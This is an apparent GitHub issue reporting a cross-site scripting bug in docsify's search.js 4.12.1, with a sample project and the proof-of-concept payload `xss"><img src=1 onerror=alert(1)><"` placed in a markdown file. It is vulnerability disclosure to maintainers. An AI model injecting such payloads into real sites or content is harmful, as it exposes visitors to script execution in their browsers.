search.js v4.12.1 Cross-Site Scripting 

## Bug Report

#### Steps to reproduce

##### 1. create a simple docsify project
file tree
```
.
├── README.md
├── _sidebar.md
├── index.html
└── test
    └── xss.md
```
index.html
```
<!DOCTYPE html>

<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>test</title>
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
  <meta name="description" content="Description">
  <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/docsify/lib/themes/vue.css">
  <link rel="stylesheet" href="/css/sidebar.css">
</head>
<body>

  <div id="app"></div>

  <script>
    window.$docsify = {
      loadSidebar: true,
      homepage: './README.md',
      alias:{
        '/.*/_sidebar.md': '/_sidebar.md',
      },
      autoHeader: true,
      auto2top: true,
      search: {
        noData: {
          '/': 'No results!'
        },
        paths: 'auto',
        placeholder: {
          '/': 'Search'
        },
        hideOtherSidebarContent: true,
        depth: 1
      },
      name: 'test',
    }
  </script>

  <script src="//cdn.jsdelivr.net/npm/docsify/lib/docsify.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/docsify/lib/plugins/search.js"></script>

</body>
</html>
```

xss.md

```
# xss test

    xss"><img src=1 onerror=alert(1)><"
```

_sidebar.md

```
- Test
  - [xss](./test/xss.md)
```

##### 2. start a http server

![image](https://user-images.githubusercontent.com/30471149/113081487-57c8b900-920b-11eb-8099-d71c6ea61f0b.png)
![image](https://user-images.githubusercontent.com/30471149/113082103-6fed0800-920c-11eb-84cc-e11057ddba33.png)

when user search  something near XSS payload and the javascript which should rendering as markdown will be execute

##### 3. input `x` in search filed

![image](https://user-images.githubusercontent.com/30471149/113081528-6d3de300-920b-11eb-8a75-320d058e59a9.png)



#### What is current behaviour



#### What is the expected behaviour



#### Other relevant information


- [ ] Bug does still occur when all/other plugins are disabled?

- Your OS:  Mac OS
- Node.js version:  v12.19.0
- npm/yarn version: 
- Browser version: 
- Docsify version:  4.12.1
- Docsify plugins: search.js



#### Please create a reproducible sandbox 

https://xl9pw.csb.app/

#### Mention the docsify version in which this bug was not present (if any)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

search.js v4.12.1 Cross-Site Scripting #1549

Bug Report

Steps to reproduce

1. create a simple docsify project

2. start a http server

3. input `x` in search filed

What is current behaviour

What is the expected behaviour

Other relevant information

Please create a reproducible sandbox

Mention the docsify version in which this bug was not present (if any)

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Uh oh!

search.js v4.12.1 Cross-Site Scripting #1549

Description

Bug Report

Steps to reproduce

1. create a simple docsify project

2. start a http server

3. input x in search filed

What is current behaviour

What is the expected behaviour

Other relevant information

Please create a reproducible sandbox

Mention the docsify version in which this bug was not present (if any)

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions

3. input `x` in search filed